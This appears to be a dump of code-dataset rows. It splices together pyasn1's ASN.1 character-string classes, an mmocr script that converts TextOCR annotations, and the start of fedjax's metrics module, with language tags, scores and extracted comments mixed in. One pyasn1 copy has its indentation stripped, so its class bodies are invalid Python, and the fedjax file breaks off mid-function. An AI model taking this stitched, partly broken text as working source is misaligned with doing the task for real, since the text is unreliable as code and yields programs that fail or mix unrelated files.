    #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
    #: associated with |ASN.1| type.
    tagSet = AbstractCharacterString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 28)
    )
    encoding = "utf-32-be"

    # Optimization for faster codec lookup
    typeId = AbstractCharacterString.getTypeId()


class BMPString(AbstractCharacterString):
    # ASN.1 BMPString: implicit universal tag 30, UTF-16BE payload.
    __doc__ = AbstractCharacterString.__doc__

    #: Set (on class, not on instance) or return a
    #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
    #: associated with |ASN.1| type.
    tagSet = AbstractCharacterString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 30)
    )
    encoding = "utf-16-be"

    # Optimization for faster codec lookup
    typeId = AbstractCharacterString.getTypeId()


class UTF8String(AbstractCharacterString):
    # ASN.1 UTF8String: implicit universal tag 12, UTF-8 payload.
    __doc__ = AbstractCharacterString.__doc__

    #: Set (on class, not on instance) or return a
    #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
    #: associated with |ASN.1| type.
    tagSet = AbstractCharacterString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 12)
    )
    encoding = "utf-8"

    # Optimization for faster codec lookup
    typeId = AbstractCharacterString.getTypeId()
|
#
# This file is part of pyasn1 software.
#
# Copyright (c) 2005-2017, <NAME> <<EMAIL>>
# License: http://pyasn1.sf.net/license.html
#
import sys
from pyasn1.type import univ, tag
from pyasn1 import error
__all__ = ['NumericString', 'PrintableString', 'TeletexString', 'T61String', 'VideotexString',
'IA5String', 'GraphicString', 'VisibleString', 'ISO646String',
'GeneralString', 'UniversalString', 'BMPString', 'UTF8String']
# Re-export the univ "no value" sentinels so this module's users don't need
# to import pyasn1.type.univ directly.
NoValue = univ.NoValue
noValue = univ.noValue
class AbstractCharacterString(univ.OctetString):
    """Creates |ASN.1| type or object.

    |ASN.1| objects are immutable and duck-type Python 2 :class:`unicode` or Python 3 :class:`str`.
    When used in octet-stream context, |ASN.1| type assumes "|encoding|" encoding.

    Parameters
    ----------
    value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object
        unicode object (Python 2) or string (Python 3), alternatively string
        (Python 2) or bytes (Python 3) representing octet-stream of serialized
        unicode string (note `encoding` parameter) or |ASN.1| class instance.
    tagSet: :py:class:`~pyasn1.type.tag.TagSet`
        Object representing non-default ASN.1 tag(s)
    subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
        Object representing non-default ASN.1 subtype constraint(s)
    encoding: :py:class:`str`
        Unicode codec ID to encode/decode :class:`unicode` (Python 2) or
        :class:`str` (Python 3) the payload when |ASN.1| object is used
        in octet-stream context.

    Raises
    ------
    : :py:class:`pyasn1.error.PyAsn1Error`
        On constraint violation or bad initializer.
    """
    # The payload (self._value) is always held as text; the two branches
    # below install text<->bytes conversion helpers appropriate for the
    # interpreter the class is defined under.
    if sys.version_info[0] <= 2:
        def __str__(self):
            # On Python 2, str() must yield bytes: serialize the text
            # payload with this type's codec.
            try:
                return self._value.encode(self.encoding)
            except UnicodeEncodeError:
                raise error.PyAsn1Error(
                    'Can\'t encode string \'%s\' with \'%s\' codec' % (self._value, self.encoding)
                )

        def __unicode__(self):
            return unicode(self._value)

        def prettyIn(self, value):
            # Normalise any accepted initializer into the canonical internal
            # (unicode) representation.
            if isinstance(value, unicode):
                return value
            elif isinstance(value, str):
                try:
                    return value.decode(self.encoding)
                except (LookupError, UnicodeDecodeError):
                    raise error.PyAsn1Error(
                        'Can\'t decode string \'%s\' with \'%s\' codec' % (value, self.encoding)
                    )
            elif isinstance(value, (tuple, list)):
                # Sequence of integer code points: build a string and recurse
                # through the str branch above.
                try:
                    return self.prettyIn(''.join([chr(x) for x in value]))
                except ValueError:
                    raise error.PyAsn1Error(
                        'Bad %s initializer \'%s\'' % (self.__class__.__name__, value)
                    )
            else:
                try:
                    return unicode(value)
                except UnicodeDecodeError:
                    raise error.PyAsn1Error(
                        'Can\'t turn object \'%s\' into unicode' % (value,)
                    )

        def asOctets(self, padding=True):
            # Serialized (byte) form of the payload.
            return str(self)

        def asNumbers(self, padding=True):
            # Serialized form as a tuple of integer octet values.
            return tuple([ord(x) for x in str(self)])

    else:
        def __str__(self):
            return str(self._value)

        def __bytes__(self):
            # Serialize the text payload with this type's codec.
            try:
                return self._value.encode(self.encoding)
            except UnicodeEncodeError:
                raise error.PyAsn1Error(
                    'Can\'t encode string \'%s\' with \'%s\' codec' % (self._value, self.encoding)
                )

        def prettyIn(self, value):
            # Normalise any accepted initializer into the canonical internal
            # (str) representation.
            if isinstance(value, str):
                return value
            elif isinstance(value, bytes):
                try:
                    return value.decode(self.encoding)
                except UnicodeDecodeError:
                    raise error.PyAsn1Error(
                        'Can\'t decode string \'%s\' with \'%s\' codec' % (value, self.encoding)
                    )
            elif isinstance(value, (tuple, list)):
                # Sequence of integer octet values -> bytes -> recurse.
                return self.prettyIn(bytes(value))
            else:
                try:
                    return str(value)
                except (UnicodeDecodeError, ValueError):
                    raise error.PyAsn1Error(
                        'Can\'t turn object \'%s\' into unicode' % (value,)
                    )

        def asOctets(self, padding=True):
            # Serialized (byte) form of the payload.
            return bytes(self)

        def asNumbers(self, padding=True):
            # Serialized form as a tuple of integer octet values.
            return tuple(bytes(self))

    def prettyOut(self, value):
        return value

    def __reversed__(self):
        return reversed(self._value)

    def clone(self, value=noValue, **kwargs):
        """Creates a copy of a |ASN.1| type or object.

        Any parameters to the *clone()* method will replace corresponding
        properties of the |ASN.1| object.

        Parameters
        ----------
        value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object
            unicode object (Python 2) or string (Python 3), alternatively string
            (Python 2) or bytes (Python 3) representing octet-stream of serialized
            unicode string (note `encoding` parameter) or |ASN.1| class instance.
        tagSet: :py:class:`~pyasn1.type.tag.TagSet`
            Object representing non-default ASN.1 tag(s)
        subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
            Object representing non-default ASN.1 subtype constraint(s)
        encoding: :py:class:`str`
            Unicode codec ID to encode/decode :py:class:`unicode` (Python 2) or
            :py:class:`str` (Python 3) the payload when |ASN.1| object is used
            in octet-stream context.

        Returns
        -------
        :
            new instance of |ASN.1| type/value
        """
        return univ.OctetString.clone(self, value, **kwargs)

    def subtype(self, value=noValue, **kwargs):
        """Creates a copy of a |ASN.1| type or object.

        Any parameters to the *subtype()* method will be added to the corresponding
        properties of the |ASN.1| object.

        Parameters
        ----------
        value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object
            unicode object (Python 2) or string (Python 3), alternatively string
            (Python 2) or bytes (Python 3) representing octet-stream of serialized
            unicode string (note `encoding` parameter) or |ASN.1| class instance.
        implicitTag: :py:class:`~pyasn1.type.tag.Tag`
            Implicitly apply given ASN.1 tag object to caller's
            :py:class:`~pyasn1.type.tag.TagSet`, then use the result as
            new object's ASN.1 tag(s).
        explicitTag: :py:class:`~pyasn1.type.tag.Tag`
            Explicitly apply given ASN.1 tag object to caller's
            :py:class:`~pyasn1.type.tag.TagSet`, then use the result as
            new object's ASN.1 tag(s).
        subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
            Object representing non-default ASN.1 subtype constraint(s)
        encoding: :py:class:`str`
            Unicode codec ID to encode/decode :py:class:`unicode` (Python 2) or
            :py:class:`str` (Python 3) the payload when |ASN.1| object is used
            in octet-stream context.

        Returns
        -------
        :
            new instance of |ASN.1| type/value
        """
        return univ.OctetString.subtype(self, value, **kwargs)
class NumericString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 18)
)
encoding = 'us-ascii'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class PrintableString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 19)
)
encoding = 'us-ascii'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class TeletexString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 20)
)
encoding = 'iso-8859-1'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class T61String(TeletexString):
__doc__ = TeletexString.__doc__
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class VideotexString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 21)
)
encoding = 'iso-8859-1'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class IA5String(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 22)
)
encoding = 'us-ascii'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class GraphicString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 25)
)
encoding = 'iso-8859-1'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class VisibleString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 26)
)
encoding = 'us-ascii'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class ISO646String(VisibleString):
__doc__ = VisibleString.__doc__
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class GeneralString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 27)
)
encoding = 'iso-8859-1'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class UniversalString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 28)
)
encoding = "utf-32-be"
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class BMPString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 30)
)
encoding = "utf-16-be"
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class UTF8String(AbstractCharacterString):
    # ASN.1 UTF8String: implicitly tagged [UNIVERSAL 12]; payload is
    # encoded/decoded with the 'utf-8' codec in octet-stream context.
    __doc__ = AbstractCharacterString.__doc__
    #: Set (on class, not on instance) or return a
    #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
    #: associated with |ASN.1| type.
    tagSet = AbstractCharacterString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 12)
    )
    #: Unicode codec used for the string payload in octet-stream context.
    encoding = "utf-8"
    # Optimization for faster codec lookup
    typeId = AbstractCharacterString.getTypeId()
|
en
| 0.503038
|
# # This file is part of pyasn1 software. # # Copyright (c) 2005-2017, <NAME> <<EMAIL>> # License: http://pyasn1.sf.net/license.html # Creates |ASN.1| type or object. |ASN.1| objects are immutable and duck-type Python 2 :class:`unicode` or Python 3 :class:`str`. When used in octet-stream context, |ASN.1| type assumes "|encoding|" encoding. Parameters ---------- value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object unicode object (Python 2) or string (Python 3), alternatively string (Python 2) or bytes (Python 3) representing octet-stream of serialized unicode string (note `encoding` parameter) or |ASN.1| class instance. tagSet: :py:class:`~pyasn1.type.tag.TagSet` Object representing non-default ASN.1 tag(s) subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection` Object representing non-default ASN.1 subtype constraint(s) encoding: :py:class:`str` Unicode codec ID to encode/decode :class:`unicode` (Python 2) or :class:`str` (Python 3) the payload when |ASN.1| object is used in octet-stream context. Raises ------ : :py:class:`pyasn1.error.PyAsn1Error` On constraint violation or bad initializer. Creates a copy of a |ASN.1| type or object. Any parameters to the *clone()* method will replace corresponding properties of the |ASN.1| object. Parameters ---------- value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object unicode object (Python 2) or string (Python 3), alternatively string (Python 2) or bytes (Python 3) representing octet-stream of serialized unicode string (note `encoding` parameter) or |ASN.1| class instance. 
tagSet: :py:class:`~pyasn1.type.tag.TagSet` Object representing non-default ASN.1 tag(s) subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection` Object representing non-default ASN.1 subtype constraint(s) encoding: :py:class:`str` Unicode codec ID to encode/decode :py:class:`unicode` (Python 2) or :py:class:`str` (Python 3) the payload when |ASN.1| object is used in octet-stream context. Returns ------- : new instance of |ASN.1| type/value Creates a copy of a |ASN.1| type or object. Any parameters to the *subtype()* method will be added to the corresponding properties of the |ASN.1| object. Parameters ---------- value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object unicode object (Python 2) or string (Python 3), alternatively string (Python 2) or bytes (Python 3) representing octet-stream of serialized unicode string (note `encoding` parameter) or |ASN.1| class instance. implicitTag: :py:class:`~pyasn1.type.tag.Tag` Implicitly apply given ASN.1 tag object to caller's :py:class:`~pyasn1.type.tag.TagSet`, then use the result as new object's ASN.1 tag(s). explicitTag: :py:class:`~pyasn1.type.tag.Tag` Explicitly apply given ASN.1 tag object to caller's :py:class:`~pyasn1.type.tag.TagSet`, then use the result as new object's ASN.1 tag(s). subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection` Object representing non-default ASN.1 subtype constraint(s) encoding: :py:class:`str` Unicode codec ID to encode/decode :py:class:`unicode` (Python 2) or :py:class:`str` (Python 3) the payload when |ASN.1| object is used in octet-stream context. Returns ------- : new instance of |ASN.1| type/value #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. 
# Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. # Optimization for faster codec lookup #: Set (on class, not on instance) or return a #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s) #: associated with |ASN.1| type. 
# Optimization for faster codec lookup
| 2.078594
| 2
|
tools/data/textdet/textocr_converter.py
|
xyzhu8/mmocr
| 1
|
6628058
|
import argparse
import math
import os.path as osp
import mmcv
from mmocr.utils import convert_annotations
def parse_args():
    """Parse command-line arguments for the TextOCR converter.

    Returns:
        argparse.Namespace: holds a single ``root_path`` attribute with
        the dataset root directory.
    """
    parser = argparse.ArgumentParser(
        description='Generate training and validation set of TextOCR ')
    parser.add_argument('root_path', help='Root dir path of TextOCR')
    return parser.parse_args()
def collect_textocr_info(root_path, annotation_filename, print_every=1000):
    """Collect per-image annotation infos from a TextOCR json file.

    Args:
        root_path (str): Root directory of the TextOCR dataset.
        annotation_filename (str): Name of the TextOCR json annotation file.
        print_every (int): Print a progress line every ``print_every`` images.

    Returns:
        list[dict]: One info dict per image; each carries an ``anno_info``
        list of COCO-style annotation dicts and a ``segm_file`` path.

    Raises:
        FileNotFoundError: If the annotation file does not exist.
    """
    annotation_path = osp.join(root_path, annotation_filename)
    if not osp.exists(annotation_path):
        # FileNotFoundError (an Exception subclass) is more precise than the
        # bare Exception raised previously and stays catchable by old callers.
        raise FileNotFoundError(
            f'{annotation_path} not exists, please check and try again.')
    annotation = mmcv.load(annotation_path)
    img_infos = []
    for i, img_info in enumerate(annotation['imgs'].values()):
        if i > 0 and i % print_every == 0:
            # len() of the dict equals len() of its values view.
            print(f'{i}/{len(annotation["imgs"])}')
        img_info['segm_file'] = annotation_path
        ann_ids = annotation['imgToAnns'][img_info['id']]
        anno_info = []
        for ann_id in ann_ids:
            ann = annotation['anns'][ann_id]
            # TextOCR marks illegible or non-English words with '.';
            # treat those as crowd regions so they are ignored in training.
            text_label = ann['utf8_string']
            iscrowd = 1 if text_label == '.' else 0
            x, y, w, h = ann['bbox']
            # Clamp the box to the image (non-negative, integral corners).
            x, y = max(0, math.floor(x)), max(0, math.floor(y))
            w, h = math.ceil(w), math.ceil(h)
            bbox = [x, y, w, h]
            # Renamed loop variable so it no longer shadows the bbox `x`.
            segmentation = [max(0, int(p)) for p in ann['points']]
            anno = dict(
                iscrowd=iscrowd,
                category_id=1,
                bbox=bbox,
                area=ann['area'],
                segmentation=[segmentation])
            anno_info.append(anno)
        img_info.update(anno_info=anno_info)
        img_infos.append(img_info)
    return img_infos
def main():
    # Convert both TextOCR splits to COCO-style instance json files
    # written under the dataset root directory.
    args = parse_args()
    root_path = args.root_path
    print('Processing training set...')
    training_infos = collect_textocr_info(root_path, 'TextOCR_0.1_train.json')
    convert_annotations(training_infos,
                        osp.join(root_path, 'instances_training.json'))
    print('Processing validation set...')
    val_infos = collect_textocr_info(root_path, 'TextOCR_0.1_val.json')
    convert_annotations(val_infos, osp.join(root_path, 'instances_val.json'))
    print('Finish')
if __name__ == '__main__':
main()
|
import argparse
import math
import os.path as osp
import mmcv
from mmocr.utils import convert_annotations
def parse_args():
parser = argparse.ArgumentParser(
description='Generate training and validation set of TextOCR ')
parser.add_argument('root_path', help='Root dir path of TextOCR')
args = parser.parse_args()
return args
def collect_textocr_info(root_path, annotation_filename, print_every=1000):
annotation_path = osp.join(root_path, annotation_filename)
if not osp.exists(annotation_path):
raise Exception(
f'{annotation_path} not exists, please check and try again.')
annotation = mmcv.load(annotation_path)
# img_idx = img_start_idx
img_infos = []
for i, img_info in enumerate(annotation['imgs'].values()):
if i > 0 and i % print_every == 0:
print(f'{i}/{len(annotation["imgs"].values())}')
img_info['segm_file'] = annotation_path
ann_ids = annotation['imgToAnns'][img_info['id']]
anno_info = []
for ann_id in ann_ids:
ann = annotation['anns'][ann_id]
# Ignore illegible or non-English words
text_label = ann['utf8_string']
iscrowd = 1 if text_label == '.' else 0
x, y, w, h = ann['bbox']
x, y = max(0, math.floor(x)), max(0, math.floor(y))
w, h = math.ceil(w), math.ceil(h)
bbox = [x, y, w, h]
segmentation = [max(0, int(x)) for x in ann['points']]
anno = dict(
iscrowd=iscrowd,
category_id=1,
bbox=bbox,
area=ann['area'],
segmentation=[segmentation])
anno_info.append(anno)
img_info.update(anno_info=anno_info)
img_infos.append(img_info)
return img_infos
def main():
args = parse_args()
root_path = args.root_path
print('Processing training set...')
training_infos = collect_textocr_info(root_path, 'TextOCR_0.1_train.json')
convert_annotations(training_infos,
osp.join(root_path, 'instances_training.json'))
print('Processing validation set...')
val_infos = collect_textocr_info(root_path, 'TextOCR_0.1_val.json')
convert_annotations(val_infos, osp.join(root_path, 'instances_val.json'))
print('Finish')
if __name__ == '__main__':
main()
|
en
| 0.436393
|
# img_idx = img_start_idx # Ignore illegible or non-English words
| 2.578764
| 3
|
fedjax/legacy/core/metrics.py
|
alshedivat/fedjax
| 0
|
6628059
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Metrics."""
import abc
import numbers
from typing import Any, Optional, Tuple
from fedjax.legacy.core import dataclasses
import jax
import jax.numpy as jnp
# Small constant to add to denominator to avoid division by 0.
_SAFE_DIVIDE = 1e-10
class Metric(metaclass=abc.ABCMeta):
  """Interface for all metric containers (e.g. accuracy).

  `Metric` stores intermediate values as well as methods for accumulation and
  final result computation.
  """

  @abc.abstractmethod
  def merge(self, other: 'Metric') -> 'Metric':
    """Merges `self` and `other` into a new single accumulated metric."""

  @abc.abstractmethod
  def result(self) -> jnp.ndarray:
    """Computes final metric result from intermediate values."""

  def __str__(self) -> str:
    """Returns human readable string representation of metric."""
    # Shows the repr (intermediate state) alongside the reduced result.
    return f'{repr(self)} => {self.result()}'
def _is_scalar(x):
if isinstance(x, jnp.ndarray):
return x.ndim == 0
return isinstance(x, numbers.Number)
@dataclasses.dataclass
class MeanMetric(Metric):
  """Implementation for metrics that are reduced by averaging (total / count).

  Attributes:
    total: Scalar sum of intermediate values.
    count: Scalar number of intermediate values.
  """
  total: jnp.ndarray
  count: jnp.ndarray

  def __post_init__(self):
    # Fail fast on non-scalar fields so merge()/result() stay well-defined.
    if not (_is_scalar(self.total) and _is_scalar(self.count)):
      raise TypeError('total and count must both be scalars.')

  @classmethod
  def from_values(cls,
                  values: jnp.ndarray,
                  weights: Optional[jnp.ndarray] = None) -> 'MeanMetric':
    """Constructs MeanMetric from intermediate values and optional weights.

    Args:
      values: Array of intermediate values.
      weights: Array of weights for each intermediate value of the same shape as
        values. Defaults to unweighted.

    Returns:
      MeanMetric for (possibly weighted) average of values.
    """
    if weights is None:
      weights = jnp.ones_like(values)
    return cls(total=jnp.sum(values * weights), count=jnp.sum(weights))

  def merge(self, other: 'MeanMetric') -> 'MeanMetric':
    """Accumulates two MeanMetrics by summing totals and counts."""
    return type(self)(
        total=self.total + other.total, count=self.count + other.count)

  def result(self) -> jnp.ndarray:
    """Returns the (weighted) mean; _SAFE_DIVIDE guards a zero count."""
    return self.total / jnp.maximum(self.count, _SAFE_DIVIDE)
@dataclasses.dataclass
class CountMetric(Metric):
  """Implementation for counter metrics (e.g. num_out_of_vocabulary_words)."""
  # Scalar running count.
  count: jnp.ndarray

  def __post_init__(self):
    if not _is_scalar(self.count):
      raise TypeError('count must be a scalar.')

  def merge(self, other: 'CountMetric') -> 'CountMetric':
    """Accumulates two CountMetrics by summing their counts."""
    return type(self)(count=self.count + other.count)

  def result(self) -> jnp.ndarray:
    return self.count
def _unreduced_cross_entropy_loss_fn(targets: jnp.ndarray,
preds: jnp.ndarray) -> jnp.ndarray:
"""Returns unreduced cross entropy loss."""
num_classes = preds.shape[-1]
log_preds = jax.nn.log_softmax(preds)
one_hot_targets = jax.nn.one_hot(targets, num_classes)
return -jnp.sum(one_hot_targets * log_preds, axis=-1)
def cross_entropy_loss_fn(targets: jnp.ndarray,
                          preds: jnp.ndarray) -> MeanMetric:
  """Computes cross entropy loss.

  Args:
    targets: Target values of shape [batch_size, ...] in range [0, num_classes).
    preds: Unnormalized model output of shape [batch_size, ..., num_classes].

  Returns:
    Metric for loss.
  """
  # Unweighted mean over all per-example losses.
  return MeanMetric.from_values(
      _unreduced_cross_entropy_loss_fn(targets, preds))
def masked_cross_entropy_loss_fn(
    targets: jnp.ndarray, preds: jnp.ndarray,
    mask_values: Tuple[int, ...] = ()) -> MeanMetric:
  """Computes cross entropy loss after discounting masked values.

  Args:
    targets: Target values of shape [batch_size, ...] in range [0, num_classes).
    preds: Unnormalized model output of shape [batch_size, ..., num_classes].
    mask_values: Target values to be masked and not counted in loss.

  Returns:
    Metric for masked loss.
  """
  # Weight 0 removes a target from the weighted mean; start fully weighted.
  weights = jnp.ones_like(targets, dtype=preds.dtype)
  for masked_value in mask_values:
    weights = weights * (targets != masked_value)
  per_example_loss = _unreduced_cross_entropy_loss_fn(targets, preds)
  return MeanMetric.from_values(per_example_loss, weights=weights)
def accuracy_fn(targets: jnp.ndarray, preds: jnp.ndarray) -> MeanMetric:
  """Computes accuracy.

  Args:
    targets: Target values of shape [batch_size, ...] in range [0, num_classes).
    preds: Unnormalized model output of shape [batch_size, ..., num_classes].

  Returns:
    Metric for accuracy.
  """
  # A prediction is correct when the argmax class equals the target.
  predictions = jnp.argmax(preds, axis=-1)
  correct = predictions == targets
  return MeanMetric.from_values(correct)
def masked_accuracy_fn(
    targets: jnp.ndarray,
    preds: jnp.ndarray,
    mask_values: Tuple[int, ...] = (),) -> MeanMetric:
  """Computes accuracy after discounting masked values.

  Args:
    targets: Target values of shape [batch_size, ...] in range [0, num_classes).
    preds: Unnormalized model output of shape [batch_size, ..., num_classes].
    mask_values: Target values to be masked and not counted in accuracy.

  Returns:
    Metric for masked accuracy.
  """
  # Weight 0 removes a target from the weighted mean; start fully weighted.
  weights = jnp.ones_like(targets, dtype=preds.dtype)
  for masked_value in mask_values:
    weights = weights * (targets != masked_value)
  correct = jnp.argmax(preds, axis=-1) == targets
  return MeanMetric.from_values(correct, weights=weights)
def masked_accuracy_fn_with_logits_mask(
    targets: jnp.ndarray,
    preds: jnp.ndarray,
    logits_mask: jnp.ndarray,
    mask_values: Tuple[int, ...] = (),
) -> MeanMetric:
  """Computes accuracy after discounting masked values.

  Args:
    targets: Target values of shape [batch_size, ...] in range [0, num_classes).
    preds: Unnormalized model output of shape [batch_size, ..., num_classes].
    logits_mask: Mask of shape [num_classes] to be applied for preds.
    mask_values: Target values to be masked and not counted in accuracy.

  Returns:
    Metric for masked accuracy with logits mask.
  """
  # Weight 0 removes a target from the weighted mean; start fully weighted.
  weights = jnp.ones_like(targets, dtype=preds.dtype)
  for masked_value in mask_values:
    weights = weights * (targets != masked_value)
  # The additive logits mask suppresses classes before the argmax is taken.
  masked_preds = preds + logits_mask
  correct = jnp.argmax(masked_preds, axis=-1) == targets
  return MeanMetric.from_values(correct, weights=weights)
def masked_count(targets: jnp.ndarray,
                 mask_values: Tuple[Any, ...] = ()) -> CountMetric:
  """Counts total number of non masked targets."""
  # Each target contributes 1 unless it matches any masked value.
  keep = jnp.ones_like(targets, dtype=jnp.int32)
  for masked_value in mask_values:
    keep = keep * (targets != masked_value)
  return CountMetric(count=jnp.sum(keep))
def truncation_rate(targets: jnp.ndarray,
                    eos_value: int,
                    pad_value: int) -> MeanMetric:
  """Computes the proportion of sequence examples that were truncated.

  Args:
    targets: Target values of shape [batch_size, sequence_length, ...].
    eos_value: Target value denoting end of sequence. Truncated sequences will
      not have this value.
    pad_value: Optional target value for padding to discount empty sequences.

  Returns:
    Metric for truncation rate.
  """
  # A sequence counts as truncated when it is non-empty yet never reaches EOS.
  not_empty = jnp.any(targets != pad_value, axis=1)
  is_truncated = jnp.all(targets != eos_value, axis=1) * not_empty
  return MeanMetric(total=jnp.sum(is_truncated), count=jnp.sum(not_empty))
def oov_rate(
    targets: jnp.ndarray,
    oov_values: Tuple[int, ...],
    mask_values: Tuple[int, ...] = ()) -> MeanMetric:
